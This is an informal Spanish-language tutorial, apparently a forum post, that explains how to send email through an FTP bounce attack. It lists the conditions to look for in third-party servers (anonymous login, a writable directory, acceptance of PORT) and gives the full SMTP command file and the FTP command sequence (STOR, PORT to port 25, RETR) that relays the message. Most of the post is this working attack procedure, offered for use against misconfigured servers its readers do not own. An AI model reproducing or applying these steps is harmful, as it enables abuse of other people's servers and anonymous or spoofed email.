Explicaré aquí la menara de enviar correo mediante FTP por sugerencia/pregunta de mi amigo raac .
Se trata de usar el protocolo FTP para enviar un correo explotando una vulnerabilidad ya antigua y mala configuración que todavía es muy común ver. La manera de usar FTP para envio de correo es indicarle al servidor ina IP distinta a la normal (21) y eviarle un archivo de texto plano con comandos SMTP. Para esp necesitaremos un servidor Fetepé que acepte conexiones anónimas (los hay a montones). Otro requisito es que acepte el envio de ficheros, osease, que tenga el servidor un directorio con los permisos adecuados, que tambíen los hay. Y el último esque acepte el comando PORT (este es más o menos la vilnerabilidad). Recordemos para que sirve el comando PORT: "Identifica una dirección de red y un puerto para que el servidor inicie una conexión de datos"
----------> Empezamos:
Escribimos primero el fichero TXT con los comandos SMTP como si estuvieramos en TELNET directamente.
----------------------------------
HELO usuario
MAIL FROM: [email protected]
RCPT TO: [email protected]
DATA
Subject: Hola tronko, que tal estás
Pos nada que era para saludarte.
.
QUIT
---------------------------------------
Guardamos todo esto en un archivo TXT. Por ejemplo envio.txt
Ahora nos conectamos por Fetepé al servidor que hayamos visto que cumple las condiciones
-----------------------------------
FTP servidor.elegido
(respuesta del servidor)
USER anonymous
(respuesta del servidor)
PASS ***********
(varias respuestas del servidor)
CWD incoming
(respuesta del servidor)
STOR envio (este es el archivo .txt)
(respuesta del servidor)
PORT xxx.xxx.xx.xx,25 (IP del servidor y puerto)
(respuesta del servidor)
RETR envio
(respuesta del servidor)
QUIT
----------------------------------------
Y ya está enviado el correo.
Un saludo,
